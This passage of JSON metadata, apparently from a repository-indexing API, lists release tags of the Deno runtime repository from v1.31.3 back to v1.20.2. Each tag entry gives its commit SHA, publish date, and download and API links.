epositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204ea